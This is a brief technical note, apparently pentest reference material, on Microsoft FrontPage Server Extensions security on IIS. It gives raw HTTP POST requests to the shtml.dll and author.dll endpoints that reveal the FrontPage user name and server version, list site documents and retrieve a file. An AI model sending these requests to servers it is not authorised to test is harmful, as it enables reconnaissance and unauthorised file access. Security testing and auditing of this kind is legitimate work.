On Windows NT and IIS, FrontPage security is basically controlled by the access rights to the three files Admin.dll, Author.dll, and Shtml.dll. These rights respectively determine administration, authoring, and browsing rights. For example, if a remote user is able to read and execute Admin.dll, then that user is able to administer the web site.
The authentication dll's are structured as follows: Web Root _vti_bin shtml.dll _vti_aut author.dll _vti_adm admin.dll
Request 1: POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0 Connection: Keep-Alive Date: Mon, 23 Mar 2003 00:00:15 GMT Accept: / Host: 208.51.43.138 User-Agent: MSFrontPage/4.0 Content-Type: application/x-www-form-urlencoded MIME-Version: 1.0 X-Vermeer-Content-Type: application/x-www-form-urlencoded Content-Length: 59
method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f <=== Display the frontpage user name method=server+version%3a4%2e0%2e2%2e2611 <=== To identify server version=========================================
Request 2: POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 MIME-Version: 1.0 User-Agent: MSFrontPage/4.0 Accept: auth/sicily Content-Length: 241 Content-Type: application/x-www-form-urlencoded X-Vermeer-Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive
method=open+service%3a3%2e0%2e2%2e1706&service%5fname=%2f method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true& listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl= To retreive a file, you send this as the POST data: method=get+document%3a3%2e0%2e2%2e1105&service%5fname=&document%5fname=about%2fdefault%2ehtm&old%5ftheme%5fhtml=false&force=true& get%5foption=none&doc%5fversion=Reference Link- http://grox.net/doc/web/frontpage/security.htm http://sourceforge.net/apps/trac/w3af/ticket/145813